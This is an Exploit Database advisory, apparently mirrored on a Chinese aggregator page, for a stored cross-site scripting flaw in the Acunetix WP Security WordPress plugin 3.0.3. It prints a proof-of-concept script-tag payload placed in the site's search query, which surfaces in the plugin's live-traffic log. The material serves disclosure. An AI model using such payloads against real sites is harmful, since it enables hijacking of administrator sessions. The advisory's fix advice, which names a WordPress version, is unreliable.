WordPress Plugin Acunetix WP Security Plugin 3.0.3 – Cross-Site Scripting

• Exploit Database
• 125 阅读

• 作者： Johto Robbie
  日期： 2016-05-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39761/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39

  1. Introduction   # Exploit Title: Acunetix WP Security 3.0.3 XSS # Date: May.03.2016 # Exploit Author: Johto Robbie # Facebook: https://www.facebook.com/johto.robbie # Vendor: VN Hacker News # Tested On: Apache 2.4.17 / PHP 5.6.16 / Windows 10 / WordPress 4.5.1 # Category: Webapps # Software Link: http://localhost:8888/wordpress/wp-admin/admin.php?page=swpa_live_traffic   2. Descryption:   I have to insert scripts into the content search wordpress. The result is that it is logging in Acunetix Secure WordPress. Taking advantage of this, I have exploited XSS vulnerability   <span class="w-entry"><a href="http://localhost:8888/wordpress/?s="><script>alert("Johto.Robbie"</script>" target="_blank" title="Opens in a new tab"> http://localhost:8888/wordpress/?s= "><script>alert("Johto.Robbie"</script></a></span>   Video Demonstration: https://www.youtube.com/watch?v=L8t3_HGriP8&feature=youtu.be       3. Report Timeline   02-05-2016 : Discovered 02-05-2016 : Vendor notified     4. Solution   Update to version 4.5.1